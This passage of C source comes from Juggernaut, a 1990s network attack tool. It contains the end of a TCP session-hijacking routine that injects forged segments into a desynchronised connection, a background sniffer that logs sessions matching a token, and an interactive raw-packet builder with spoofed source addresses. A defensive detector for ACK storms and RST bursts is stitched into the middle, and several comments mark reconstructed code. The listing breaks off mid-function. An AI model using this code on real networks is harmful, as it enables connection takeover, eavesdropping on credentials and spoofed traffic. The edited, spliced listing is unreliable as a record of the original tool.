tpack.ip.tot_len=htons(IPHDR+TCPHDR+len);
ppheader->tlen=htons(TCPHDR+len);
if(setjmp(env)){
if(verbosity)fprintf(stderr,"Quiet connection, try again later. [soft error, returning]\n");
return;
}
signal(SIGALRM,nettimeout);
alarm(0);
alarm(netreadtimeout);
/* Here we setup the initial hijack state. We
need to desynch the connection, and the next
packet that comes by will be the catalyst. */
while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->daddr&&tcphp->source==target->dport){
tpack.tcp.seq=tcphp->ack_seq;
tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1);
bcopy(&tpack.tcp,tempBuf+PHDR,TCPHDR+len); /* header + data only, after the pseudo-header */
tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+len);
sendto(ripsock,&tpack,IPHDR+TCPHDR+len,0,(struct sockaddr *)&sin,sizeof(sin));
break;
}
alarm(0);
while(sigsentry){ /* Main hijack loop */
if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->daddr&&tcphp->source==target->dport){
if(!tcphp->psh)continue; /* If this is not data, ignore it */
dumpp(epack.payload-2,htons(iphp->tot_len)-sizeof(epack.ip)-sizeof(epack.tcp),0);
bzero(&buf,sizeof(buf));
fgets(buf,sizeof(buf),stdin);
if(!buf[1])continue; /* No input data (CR) */
len=strlen(buf)+1;
bcopy(buf,tpack.payload,len--);
tpack.tcp.psh=1;
tpack.tcp.check=0;
tpack.ip.check=0;
tpack.ip.tot_len=htons(IPHDR+TCPHDR+len);
tpack.tcp.seq=tcphp->ack_seq;
tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1);
ppheader->tlen=htons(TCPHDR+len);
bcopy(&tpack.tcp,tempBuf+PHDR,TCPHDR+len); /* header + data only, after the pseudo-header */
tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+len);
sendto(ripsock,&tpack,IPHDR+TCPHDR+len,0,(struct sockaddr *)&sin,sizeof(sin));
}
}
crst(target);
/*free(tempBuf); XXX */
close(tlinksock);
}
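The defender's side of what chijack() warns about: once the injected segment desynchronises the two ends, each keeps answering the other's out-of-window segment with the same pure ACK (the ACK storm), and the teardown in crst()/acrst() shows up as RSTS consecutive resets with stepped sequence numbers on one flow. The following is an added example, not part of Juggernaut, that scans a list of captured-segment summaries for both signatures. The record layout, thresholds and the trace are assumptions made here; in practice the records would be filled from a capture rather than constructed.

```c
/*
 * Added example (not Juggernaut code): detect the ACK storm and the RST burst
 * that the hijack and reset modules leave on the wire, over constructed records.
 */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define TH_RST 0x04
#define TH_PSH 0x08
#define TH_ACK 0x10
enum { ALERT_ACK_STORM = 1, ALERT_RST_BURST = 2 };

struct seg {                     /* one captured TCP segment, summarised */
    uint32_t ts_ms;              /* capture time in milliseconds */
    uint32_t saddr, daddr;
    uint16_t sport, dport;
    uint8_t  flags;
    uint32_t seq, ack;
    uint16_t datalen;
};

/* same direction of the same connection */
static int same_flow(const struct seg *a, const struct seg *b)
{
    return a->saddr == b->saddr && a->daddr == b->daddr &&
           a->sport == b->sport && a->dport == b->dport;
}

static int pure_ack(const struct seg *s) { return s->flags == TH_ACK && s->datalen == 0; }

/* Returns a bitmask of alerts. For each segment, count the later segments on the
   same flow within window_ms that (a) repeat its exact pure-ACK SEQ/ACK pair, or
   (b) are also RSTs. Fast-retransmit duplicate ACKs look like (a) but stop at
   three, so ack_thresh must sit well above that. */
int detect(const struct seg *t, size_t n, uint32_t window_ms, int ack_thresh, int rst_thresh)
{
    int alerts = 0;
    size_t i, j;
    for (i = 0; i < n; i++) {
        int dup_acks = 0, rsts = 0;
        for (j = i; j < n && t[j].ts_ms - t[i].ts_ms <= window_ms; j++) {
            if (!same_flow(&t[i], &t[j])) continue;
            if (pure_ack(&t[i]) && pure_ack(&t[j]) && t[j].seq == t[i].seq && t[j].ack == t[i].ack)
                dup_acks++;
            if ((t[i].flags & TH_RST) && (t[j].flags & TH_RST))
                rsts++;
        }
        if (dup_acks >= ack_thresh) alerts |= ALERT_ACK_STORM;
        if (rsts >= rst_thresh) alerts |= ALERT_RST_BURST;
    }
    return alerts;
}

#define CLIENT 0x0a000001u       /* constructed: 10.0.0.1 */
#define SERVER 0x0a000002u       /* constructed: 10.0.0.2 */
#define N_NORMAL 6               /* the first six records are ordinary traffic */

/* Constructed trace: a telnet-style keystroke exchange, then an ACK storm, then
   a 10-RST teardown like crst() sends with RSTS == 10. */
size_t sample_trace(struct seg *out)
{
    size_t n = 0; uint32_t ts = 0; int k;
    for (k = 0; k < 3; k++) {                       /* normal: 1-byte data each way */
        out[n++] = (struct seg){ ts, CLIENT, SERVER, 1234, 23, TH_ACK | TH_PSH, 1000 + k, 5000 + k, 1 };
        ts += 20;
        out[n++] = (struct seg){ ts, SERVER, CLIENT, 23, 1234, TH_ACK | TH_PSH, 5000 + k, 1001 + k, 1 };
        ts += 20;
    }
    for (k = 0; k < 10; k++) {                      /* storm: identical pure ACKs ping-pong */
        out[n++] = (struct seg){ ts, CLIENT, SERVER, 1234, 23, TH_ACK, 1003, 5003, 0 };
        ts += 1;
        out[n++] = (struct seg){ ts, SERVER, CLIENT, 23, 1234, TH_ACK, 5003, 1003, 0 };
        ts += 1;
    }
    for (k = 0; k < 10; k++) {                      /* burst: RSTs with stepped SEQ */
        out[n++] = (struct seg){ ts, SERVER, CLIENT, 23, 1234, TH_RST | TH_ACK, 5003 + k, 1003, 0 };
        ts += 1;
    }
    return n;
}

int run_normal(void) { struct seg t[64]; sample_trace(t); return detect(t, N_NORMAL, 200, 8, 5); }
int run_full(void)   { struct seg t[64]; size_t n = sample_trace(t); return detect(t, n, 200, 8, 5); }

int main(void)
{
    printf("normal traffic: alerts=%d\nfull trace: alerts=%d (1=ACK storm, 2=RST burst)\n",
           run_normal(), run_full());
    return 0;
}
```

The two-level loop is quadratic in the window, which is fine for a capture file; a live sensor would keep per-flow counters keyed on the 4-tuple instead.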
/*
* Packet sniffer parses TCP packets for token. Logs that packet, along with
* the next 'enticement` number of packets. Not really all that robust.
*/
void bloodhound(token,enticementfactor)
char *token;
int enticementfactor;
{
void parsep(char *,int,FILE *);
void shadow();
char *hostLookup(unsigned long);
FILE *fp=0;
time_t tp=0;
int length=0;
int grabflag=0; /* Time to grab some packets */
unsigned long targetsourceip=0;
unsigned short targetsourceport=0;
int tlinksock=tap(DEVICE);
if(!(fp=fopen(SNIFLOG,"a+"))){ /* Log to file */
if(verbosity){
fprintf(stderr,"Cannot open file for logging. [fatal]\n");
fprintf(stderr,"[cr]");
}
exit(0);
}
ALIGNNETPOINTERS();
fprintf(stderr,"\nDropping to background, sniffing for smarmy tidbits...\n");
shadow(); /* Dropped to the background */
fprintf(stderr,"\nSend a SIGKILL to %d when you are through.\n",getpid());
fprintf(fp,"\n---------------------------------------------------------------------\n[ Juggernaut bloodhound module log: token == '%s' ]\n",token);
time(&tp);
fprintf(fp,"[ Log started:\t\t%s---------------------------------------------------------------------\n",ctime(&tp));
fflush(fp);
while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP){
length=htons(iphp->tot_len)-sizeof(epack.ip)-sizeof(epack.tcp);
if((!grabflag)&&(strstr((epack.payload-2),token))){
grabflag=enticementfactor;
targetsourceip=iphp->saddr;
targetsourceport=tcphp->source;
fprintf(fp,"\n\t %s [%d]\t<-->\t %s [%d]\n",hostLookup(iphp->saddr),ntohs(tcphp->source),hostLookup(iphp->daddr),ntohs(tcphp->dest));
parsep(epack.payload-2,length,fp);
}
if(grabflag){ /* We have a session marked and are
logging it */
if(iphp->daddr==targetsourceip&&tcphp->dest==targetsourceport){
parsep(epack.payload-2,length,fp);
grabflag--;
}
}
}
/* NOTREACHED */
}
/*
* Packet parser. Print the packet out...
*/
void parsep(payload,length,fp)
char *payload;
int length;
FILE *fp;
{
register int tickytacky=0;
/* The loop body was lost in extraction and is reconstructed here: write
   printable bytes and line breaks to the log, show anything else as a dot. */
for(tickytacky=0;tickytacky<length;tickytacky++){
if(isprint((unsigned char)payload[tickytacky])||payload[tickytacky]=='\n'||payload[tickytacky]=='\r'||payload[tickytacky]=='\t')fputc(payload[tickytacky],fp);
else fputc('.',fp);
}
fflush(fp);
}
<-->
<++> Juggernaut/NumberOneCrush/prometheus.c
/*
*
* Juggernaut
* Version b2
*
* 1996/7 Guild productions
* daemon9[guild|phrack|r00t]
*
* comments to route@infonexus.com
*
* This coding project made possible by a grant from the Guild corporation
*
* prometheus.c - the packet assembly workshop module. Each of the main
* packet assembly subfunctions will end up calling the ip assembler to build
* the IP portion and send it (them) out.
*
* Too many dependencies in menu.c
*
* Shout out to Nirva for some suggestions/help. Nirva rules, BTW. I love
* Nirva. You should too.
*
*/
/* Header names were lost when this listing was extracted; the list below
   covers what this module uses. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/udp.h>
#include <linux/icmp.h>
#define MINIBUF 10
#define BUFSIZE 512
#define ETHHDR 14
#define PHDR 12
#define TCPHDR 20
#define UDPHDR 8
#define IPHDR 20
#define NOTRANSPORT 0x00
#define TCPTRANSPORT 0x01
#define UDPTRANSPORT 0x02
#define ICMPTRANSPORT 0x04
struct tpak{ /* TCP packet */
struct tcphdr tcp;
char payload[BUFSIZE];
}tpack;
struct upak{ /* UDP packet */
struct udphdr udp;
char payload[BUFSIZE];
}upack;
struct ipak{ /* ICMP packet */
struct icmphdr icmp;
char payload[BUFSIZE];
}ipack;
struct rippak{ /* IP packet */
struct iphdr ip;
char payload[BUFSIZE+20]; /* Payload + transport header */
}rippack;
int woe; /* Global var to let us know where to return
to... */
extern int verbosity;
/* This will change when IP/TCP options are
implemented... */
#define RIPPACKETSIZE 552 /* IP header + transport header of up to 20
bytes + 512 byte payload */
int prometheus(type)
int type;
{
void tcpa();
void udpa();
void icmpa();
void igmpa();
void ripa(int);
bzero(&rippack,sizeof(rippack));
woe=0;
switch(type){
case 1:
tcpa(); /* TCP */
break;
case 2:
udpa(); /* UDP */
break;
case 3:
icmpa(); /* ICMP */
break;
case 4:
ripa(NOTRANSPORT); /* RAW IP with no transport and no payload */
break;
case 5:
return(woe=1); /* Done assembling packets */
default:
break; /* bad input -- not done */
}
return(woe);
}
/*
* TCP assembler
*/
void tcpa(){
void ripa(int);
void mwipe();
void mpktatcp(int,unsigned short,unsigned short,unsigned long,unsigned long,char *,unsigned short,char *);
char buf[2*MINIBUF];
unsigned long val;
int packetready=0; /* flag bits */
char data[4*MINIBUF]={0},flags[MINIBUF]={0},filename[4*MINIBUF]={0};
int i,j,fd,loopsentry=1;
bzero(&tpack,sizeof(tpack));
srandom((unsigned)time(0)); /* seed pseudo random number generator */
while(loopsentry){
mwipe();
mpktatcp(packetready,ntohs(tpack.tcp.source),ntohs(tpack.tcp.dest),ntohl(tpack.tcp.seq),ntohl(tpack.tcp.ack_seq),flags,ntohs(tpack.tcp.window),data);
fgets(buf,sizeof(buf),stdin);
if(!(val=atoi(buf)))continue;
switch(val){
case 1: /* Source Port */
fprintf(stderr,"\nSource Port (0 - 65535) [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='r'){
tpack.tcp.source=htons(random()&0xffff);
packetready|=0x01;
break;
}
if(buf[0]=='q'||(val=atoi(buf))<0||val>65535){
if(packetready&0x01)packetready^=0x01; /* Clear flag
if set */
tpack.tcp.source=0;
break;
}
tpack.tcp.source=htons(val);
packetready|=0x01;
break;
case 2: /* Destination Port */
fprintf(stderr,"\nDestination Port (0 - 65535) [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='r'){
tpack.tcp.dest=htons(random()&0xffff);
packetready|=0x02;
break;
}
if(buf[0]=='q'||(val=atoi(buf))<0||val>65535){
if(packetready&0x02)packetready^=0x02;
tpack.tcp.dest=0;
break;
}
tpack.tcp.dest=htons(val);
packetready|=0x02;
break;
case 3: /* Sequence Number */
fprintf(stderr,"\nSequence Number (0 - 4294967295) [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='r'){
tpack.tcp.seq=htonl(random());
packetready|=0x04;
break;
}
if(buf[0]=='q'||buf[0]=='-'){
if(packetready&0x04)packetready^=0x04;
tpack.tcp.seq=0;
break;
}
tpack.tcp.seq=htonl(strtoul(buf,0,10));
packetready|=0x04;
break;
case 4: /* Acknowledgement Number */
fprintf(stderr,"\nAcknowledgement Number (0 - 4294967295) [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='r'){
tpack.tcp.ack_seq=htonl(random());
packetready|=0x08;
break;
}
if(buf[0]=='q'||buf[0]=='-'){
if(packetready&0x08)packetready^=0x08;
tpack.tcp.ack_seq=0;
break;
}
tpack.tcp.ack_seq=htonl(strtoul(buf,0,10));
packetready|=0x08;
break;
case 5: /* Control Flags */
i=0;
bzero(flags,sizeof(flags));
fprintf(stderr,"\nURG? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x10)packetready^=0x10;
tpack.tcp.urg=0;
break;
}
if(buf[0]=='y'){
tpack.tcp.urg=1;
flags[i++]='U';
}
fprintf(stderr,"\nACK? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x10)packetready^=0x10;
tpack.tcp.ack=0;
break;
}
if(buf[0]=='y'){
tpack.tcp.ack=1;
flags[i++]='A';
}
fprintf(stderr,"\nPSH? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x10)packetready^=0x10;
tpack.tcp.psh=0;
break;
}
if(buf[0]=='y'){
tpack.tcp.psh=1;
flags[i++]='P';
}
fprintf(stderr,"\nRST? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x10)packetready^=0x10;
tpack.tcp.rst=0;
break;
}
if(buf[0]=='y'){
tpack.tcp.rst=1;
flags[i++]='R';
}
fprintf(stderr,"\nSYN? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x10)packetready^=0x10;
tpack.tcp.syn=0;
break;
}
if(buf[0]=='y'){
tpack.tcp.syn=1;
flags[i++]='S';
}
fprintf(stderr,"\nFIN? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x10)packetready^=0x10;
tpack.tcp.fin=0;
break;
}
if(buf[0]=='y'){
tpack.tcp.fin=1;
flags[i++]='F';
}
if(!flags[0])strcpy(flags,"none set");
packetready|=0x10;
break;
case 6: /* Window Size */
fprintf(stderr,"\nWindow Size (0 - 65535) [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='r'){
tpack.tcp.window=htons(random()&0xffff);
packetready|=0x20;
break;
}
if(buf[0]=='q'||(val=atoi(buf))<0||val>65535){
if(packetready&0x20)packetready^=0x20;
tpack.tcp.window=0;
break;
}
tpack.tcp.window=htons(val);
packetready|=0x20;
break;
case 7: /* Data payload */
bzero(data,sizeof(data));
bzero(tpack.payload,sizeof(tpack.payload));
bzero(filename,sizeof(filename));
fprintf(stderr,"\nData Payload Source (512 Bytes Maximum) [qfc] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='c'){ /* Input from command line */
fprintf(stderr,"\nEnter Payload [q] >");
fgets(tpack.payload,sizeof(tpack.payload),stdin);
strncpy(data,tpack.payload,sizeof(data));
packetready|=0x40;
break;
}
if(buf[0]=='f'){ /* Input from file */
fprintf(stderr,"\nFilename [q] >");
fgets(filename,sizeof(filename),stdin);
if(filename[0]==0x0a||filename[0]=='q'){ /* Empty line or 'q' aborts */
if(packetready&0x40)packetready^=0x40;
break;
}
for(i=0;i<4*MINIBUF;i++)if(!filename[i])break;
filename[--i]=0; /* Pesky Newline */
if((fd=open(filename,O_RDONLY))<0){
if(verbosity){
fprintf(stderr,"Cannot open file for reading.\n");
fprintf(stderr,"[cr]");
getchar();
}
continue;
}
i=0;
j=0;
while(i<BUFSIZE){ /* Read up to BUFSIZE bytes, appending after each read */
j=read(fd,tpack.payload+i,BUFSIZE-i);
if(j<=0)break; /* EOF or error: no more bytes to read */
i+=j;
}
strncpy(data,filename,sizeof(filename));
close(fd);
packetready|=0x40;
break;
}
if(packetready&0x40)packetready^=0x40;
bzero(data,sizeof(data));
bzero(tpack.payload,sizeof(tpack.payload));
break;
case 8: /* Return to previous menu */
loopsentry=0;
bzero(&tpack,sizeof(tpack));
break;
case 9: /* Return to Main */
loopsentry=0;
woe=1;
break;
case 10: /* RIP assembler */
if(packetready==0x07f){ /* AND mask of all the options */
tpack.tcp.doff=5; /* Data offset */
ripa(TCPTRANSPORT); /* Checksum will be computed in
ripa */
break;
}
continue;
default: /* Bad input */
continue;
}
}
}
/*
* UDP assembler
*/
void udpa(){
void ripa(int);
void mwipe();
void mpktaudp(int,unsigned short,unsigned short,char *);
char buf[2*MINIBUF];
unsigned long val;
int packetready=0; /* flag bits */
char data[4*MINIBUF]={0},filename[4*MINIBUF]={0};
int i=0,j,fd=0,loopsentry=1;
bzero(&upack,sizeof(upack));
srandom((unsigned)time(0));
while(loopsentry){
mwipe();
mpktaudp(packetready,ntohs(upack.udp.source),ntohs(upack.udp.dest),data);
fgets(buf,sizeof(buf),stdin);
if(!(val=atoi(buf)))continue;
switch(val){
case 1: /* Source Port */
fprintf(stderr,"\nSource Port (0 - 65535) [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q'){
if(packetready&0x01)packetready^=0x01;
upack.udp.source=0;
break;
}
if(buf[0]=='r'){
upack.udp.source=htons(random()&0xffff);
packetready|=0x01;
break;
}
if(!(int)(val=atoi(buf)))break;
upack.udp.source=htons(val);
packetready|=0x01;
break;
case 2: /* Destination Port */
fprintf(stderr,"\nDestination Port (0 - 65535) [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q'){
if(packetready&0x02)packetready^=0x02;
upack.udp.dest=0;
break;
}
if(buf[0]=='r'){
upack.udp.dest=htons(random()&0xffff);
packetready|=0x02;
break;
}
if(!(int)(val=atoi(buf)))break;
upack.udp.dest=htons(val);
packetready|=0x02;
break;
case 3: /* Data payload */
bzero(data,sizeof(data));
bzero(upack.payload,sizeof(upack.payload));
bzero(filename,sizeof(filename));
fprintf(stderr,"\nData Payload Source (512 Bytes Maximum) [qfc] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='c'){ /* Input from command line */
fprintf(stderr,"\nEnter Payload [q] >");
fgets(upack.payload,sizeof(upack.payload),stdin);
strncpy(data,upack.payload,sizeof(data));
packetready|=0x04;
break;
}
if(buf[0]=='f'){ /* Input from file */
fprintf(stderr,"\nFilename [q] >");
fgets(filename,sizeof(filename),stdin);
if(filename[0]==0x0a||filename[0]=='q'){ /* Empty line or 'q' aborts */
if(packetready&0x04)packetready^=0x04;
break;
}
for(i=0;i<4*MINIBUF;i++)if(!filename[i])break;
filename[--i]=0;
if((fd=open(filename,O_RDONLY))<0){
if(verbosity){
fprintf(stderr,"Cannot open file for reading.\n");
fprintf(stderr,"[cr]");
getchar();
}
continue;
}
i=0;
j=0;
while(i<BUFSIZE){ /* Read up to BUFSIZE bytes, appending after each read */
j=read(fd,upack.payload+i,BUFSIZE-i);
if(j<=0)break; /* EOF or error */
i+=j;
}
strncpy(data,filename,sizeof(filename));
close(fd);
packetready|=0x04;
break;
}
if(packetready&0x04)packetready^=0x04;
bzero(data,sizeof(data));
bzero(upack.payload,sizeof(upack.payload));
break;
case 4: /* Return to previous menu */
loopsentry=0;
bzero(&upack,sizeof(upack));
break;
case 5: /* Return to Main */
loopsentry=0;
woe=1;
break;
case 6: /* RIP assembler */
if(packetready==0x07){
upack.udp.len=htons(UDPHDR+BUFSIZE);
ripa(UDPTRANSPORT);
break;
}
continue;
default: /* bad input */
continue;
}
}
}
/*
* ICMP assembler
 * This is nowhere near as robust as it should be. In fact, it doesn't really
 * create legal ICMP packets. Oh well. Next version. I am tired of
 * packet assembly doldrums...
*/
void icmpa(){
void ripa(int);
void mwipe();
void mpktaicmp(int,unsigned short,unsigned short,char *);
char buf[2*MINIBUF];
unsigned long val;
int packetready=0; /* flag bits */
char data[4*MINIBUF]={0},filename[4*MINIBUF]={0};
int i=0,j,fd=0,loopsentry=1;
bzero(&ipack,sizeof(ipack));
while(loopsentry){
mwipe();
mpktaicmp(packetready,ipack.icmp.type,ipack.icmp.code,data);
fgets(buf,sizeof(buf),stdin);
if(!(val=atoi(buf)))continue;
switch(val){
case 1: /* Type */
fprintf(stderr,"\nType (0,3,4,5,8,9,10,11,12,13,14,15,16,17,18) [q] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q'){
if(packetready&0x01)packetready^=0x01;
ipack.icmp.type=0;
break;
}
if(!(int)(val=atoi(buf)))break;
ipack.icmp.type=val;
packetready|=0x01;
break;
case 2: /* Code */
fprintf(stderr,"\nCode (0,1 {2,3}) [q] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q'){
if(packetready&0x02)packetready^=0x02;
ipack.icmp.code=0;
break;
}
if(!(int)(val=atoi(buf)))break;
ipack.icmp.code=val;
packetready|=0x02;
break;
case 3: /* Data payload */
bzero(data,sizeof(data));
bzero(ipack.payload,sizeof(ipack.payload));
bzero(filename,sizeof(filename));
fprintf(stderr,"\nData Payload Source (512 Bytes Maximum) [qfc] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='c'){ /* Input from command line */
fprintf(stderr,"\nEnter Payload [q] >");
fgets(ipack.payload,sizeof(ipack.payload),stdin);
strncpy(data,ipack.payload,sizeof(data));
packetready|=0x04;
break;
}
if(buf[0]=='f'){ /* Input from file */
fprintf(stderr,"\nFilename [q] >");
fgets(filename,sizeof(filename),stdin);
if(filename[0]==0x0a||filename[0]=='q'){ /* Empty line or 'q' aborts */
if(packetready&0x04)packetready^=0x04;
break;
}
for(i=0;i<4*MINIBUF;i++)if(!filename[i])break;
filename[--i]=0;
if((fd=open(filename,O_RDONLY))<0){
if(verbosity){
fprintf(stderr,"Cannot open file for reading.\n");
fprintf(stderr,"[cr]");
getchar();
}
continue;
}
i=0;
j=0;
while(i<BUFSIZE){ /* Read into the ICMP payload (the original read into upack by mistake) */
j=read(fd,ipack.payload+i,BUFSIZE-i);
if(j<=0)break; /* EOF or error */
i+=j;
}
strncpy(data,filename,sizeof(filename));
close(fd);
packetready|=0x04;
break;
}
if(packetready&0x04)packetready^=0x04;
bzero(data,sizeof(data));
bzero(ipack.payload,sizeof(ipack.payload));
break;
case 4:
loopsentry=0;
bzero(&ipack,sizeof(ipack));
break;
case 5:
loopsentry=0;
woe=1;
break;
case 6:
if(packetready==0x07){
ripa(ICMPTRANSPORT);
break;
}
continue;
default:
continue;
}
}
}
/*
* IP assembler and xmitter. Transport layer checksum routines thanks to
* Myth (Red, actually).
*/
void ripa(transport)
int transport;
{
void mwipe();
void mpktaip(int,char *,char *,unsigned short,unsigned short,char *,char *,int,char *);
char *hostLookup(unsigned long);
unsigned long nameResolve(char *);
unsigned short in_cksum(unsigned short *,int);
char buf[2*MINIBUF];
unsigned long val;
char tosflags[MINIBUF]={0},fflags[MINIBUF]={0},packettype[MINIBUF]={0};
char sip[2*MINIBUF]={0},dip[2*MINIBUF]={0},*tempBuf;
int packetready=0; /* flag bits */
int i=0,j=0,k=0; /* Counters */
int loopsentry=1,number=0;
struct sockaddr_in sin;
struct psuedoHeader{
unsigned long saddr;
unsigned long daddr;
unsigned char null;
unsigned char prot;
unsigned short tlen;
}*ppheader;
extern int ripsock;
bzero(&rippack,sizeof(rippack));
bzero((char *)&sin,sizeof(sin));
srandom((unsigned)time(0));
while(loopsentry){
i=0;
mwipe();
mpktaip(packetready,tosflags,fflags,ntohs(rippack.ip.frag_off),rippack.ip.ttl,sip,dip,number,packettype);
fgets(buf,sizeof(buf),stdin);
if(!(val=atoi(buf)))continue;
switch(val){
case 1: /* TOS */
bzero(tosflags,sizeof(tosflags));
fprintf(stderr,"\nMinimize Delay? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x01)packetready^=0x01;
rippack.ip.tos=0;
break;
}
if(buf[0]=='y'){
rippack.ip.tos|=0x10;
tosflags[i++]='D';
}
fprintf(stderr,"\nMaximize Throughput? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x01)packetready^=0x01;
rippack.ip.tos=0;
break;
}
if(buf[0]=='y'){
rippack.ip.tos|=0x08;
tosflags[i++]='T';
}
fprintf(stderr,"\nMaximize Reliability? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x01)packetready^=0x01;
rippack.ip.tos=0;
break;
}
if(buf[0]=='y'){
rippack.ip.tos|=0x04;
tosflags[i++]='R';
}
fprintf(stderr,"\nMinimize Monetary Cost? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x01)packetready^=0x01;
rippack.ip.tos=0;
break;
}
if(buf[0]=='y'){
rippack.ip.tos|=0x02;
tosflags[i++]='C';
}
if(!tosflags[0])strcpy(tosflags,"none set");
packetready|=0x01;
break;
case 2: /* Frag Flags */
bzero(fflags,sizeof(fflags));
fprintf(stderr,"\nMore Fragments? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x02)packetready^=0x02;
rippack.ip.frag_off=0;
break;
}
if(buf[0]=='y'){
rippack.ip.frag_off|=htons(0x2000); /* MF is bit 0x2000 of the flags/offset word */
fflags[i++]='M';
}
fprintf(stderr,"\nDon't Fragment? [yNq] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q'){
if(packetready&0x02)packetready^=0x02;
rippack.ip.frag_off=0;
break;
}
if(buf[0]=='y'){
rippack.ip.frag_off|=htons(0x4000); /* DF is bit 0x4000 */
fflags[i++]='D';
}
if(!fflags[0])strcpy(fflags,"none set");
packetready|=0x02;
break;
case 3: /* Frag Offset */
fprintf(stderr,"\nFragment Offset [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='r'){
rippack.ip.frag_off&=~htons(0x1fff); /* drop any earlier offset, keep the flag bits */
rippack.ip.frag_off|=htons(random()&0x1fff);
packetready|=0x04;
break;
}
if(buf[0]=='q'||(val=atoi(buf))<0||val>8191){
if(packetready&0x04)packetready^=0x04;
rippack.ip.frag_off&=~htons(0x1fff); /* the offset is the low 13 bits, stored in network order */
break;
}
rippack.ip.frag_off&=~htons(0x1fff);
rippack.ip.frag_off|=htons(val&0x1fff);
packetready|=0x04;
break;
case 4: /* TTL */
fprintf(stderr,"\nTTL (0 - 255) [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='r'){
rippack.ip.ttl=random()&0xff;
packetready|=0x08;
break;
}
if(buf[0]=='q'||(val=atoi(buf))<0||val>255){
if(packetready&0x08)packetready^=0x08;
rippack.ip.ttl=0;
break;
}
rippack.ip.ttl=val;
packetready|=0x08;
break;
case 5: /* Source Address */
bzero(sip,sizeof(sip));
fprintf(stderr,"\nSource Address [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q'){
if(packetready&0x10)packetready^=0x10;
rippack.ip.saddr=0;
break;
}
if(buf[0]=='r'){
rippack.ip.saddr=htonl(random());
strncpy(sip,hostLookup(rippack.ip.saddr),sizeof(sip));
packetready|=0x10;
break;
}
strncpy(sip,buf,sizeof(sip)-1);
for(i=0;i<2*MINIBUF;i++)if(!sip[i])break;
sip[--i]=0; /* strip the trailing newline left by fgets */
if(!(rippack.ip.saddr=nameResolve(sip))){ /* resolve the trimmed copy, not the raw line */
fprintf(stderr,"Cannot resolve IP address.\n");
fprintf(stderr,"[cr]");
getchar();
bzero(sip,sizeof(sip));
if(packetready&0x10)packetready^=0x10;
break;
}
packetready|=0x10;
break;
case 6: /* Destination Address */
bzero(dip,sizeof(dip));
fprintf(stderr,"\nDestination Address [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]==0x0a||buf[0]=='q'){
if(packetready&0x20)packetready^=0x20;
rippack.ip.daddr=0;
break;
}
if(buf[0]=='r'){
rippack.ip.daddr=htonl(random()); /* pick the address before looking its name up */
strncpy(dip,hostLookup(rippack.ip.daddr),sizeof(dip));
packetready|=0x20;
break;
}
strncpy(dip,buf,sizeof(dip)-1);
for(i=0;i<2*MINIBUF;i++)if(!dip[i])break;
dip[--i]=0; /* strip the trailing newline left by fgets */
if(!(rippack.ip.daddr=nameResolve(dip))){ /* resolve the trimmed copy, not the raw line */
fprintf(stderr,"Cannot resolve IP address.\n");
fprintf(stderr,"[cr]");
getchar();
bzero(dip,sizeof(dip));
if(packetready&0x20)packetready^=0x20;
break;
}
packetready|=0x20;
break;
case 7: /* Number of packets to send */
fprintf(stderr,"\nAmount (1 - 65536) [qr] >");
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='r'){
number=(random()&0xffff);
packetready|=0x40;
break;
}
if(buf[0]=='q'||(val=atoi(buf))<0||val>65536){
if(packetready&0x40)packetready^=0x40;
number=0;
break;
}
number=val;
packetready|=0x40;
break;
case 8: /* Return */
loopsentry=0;
bzero(&rippack,sizeof(rippack));
break;
case 9:
loopsentry=0;
woe=1;
break;
case 10:
if(packetready==0x7f){
sin.sin_family=AF_INET;
sin.sin_port=0;
